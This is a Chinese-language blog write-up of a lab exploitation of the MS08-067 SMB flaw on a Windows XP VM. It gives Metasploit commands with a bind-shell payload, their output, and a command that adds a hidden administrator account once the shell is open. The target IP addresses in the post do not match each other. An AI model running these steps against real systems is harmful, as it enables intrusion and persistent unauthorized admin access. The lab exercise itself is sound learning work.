MS08-067漏洞渗透测试

本人主专业信息对抗,结果跑去搞php,实属不务正业。。。。。。
最近要整个漏洞渗透测试实验,搞完后觉得挺有意思所以就写出来分享一下。

MS08-067漏洞会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta

1.安装靶机
下载window xp sp3 英文版镜像并安装在vmvare虚拟机上 靶机ip:192.168.65.128
2.安装kali linux以及Metasploit框架
ps:系统和框架都是通过docker进行安装操作的,所以需要先了解一下docker
运行docker 输入命令 docker pull kalilinux/kali-linux-docker 获取kali linux镜像
输入 docker -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash
创建容器并交互式运行容器 容器ip: 172.17.0.2
输入 git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
获取metasploit框架
完成后输入 cd ./metasploit进入框架目录

root@b2e6af248097:/metasploit# ./msfconsole

输入 ./msfconsole 运行框架,成功后按如下步骤

msf5 > use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2:#设置本地主机IP
LHOST => 172.17.0.2:
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128  #设置目标主机IP
RHOST => 192.168.65.129
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp   #设置payload
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options  #查看配置

Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.65.129   yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.65.129   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit #实施攻击

[*] 192.168.46.129:445 - Automatically detecting the target...
[*] 192.168.46.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.46.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.46.129:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.46.129:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.46.129:4444) at 2018-11-09 09:59:01 +0000

C:\WINDOWS\system32>

攻击成功,获取到目标主机cmdshell
接下来新建账号 添加用户名为xiayujie,密码为xiayujie的用户,并把xiayujie用户添加到管理组

C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully.  #添加成功

有了cmdshell权限,接下来想做什么就都可以了

你可能感兴趣的:(随笔)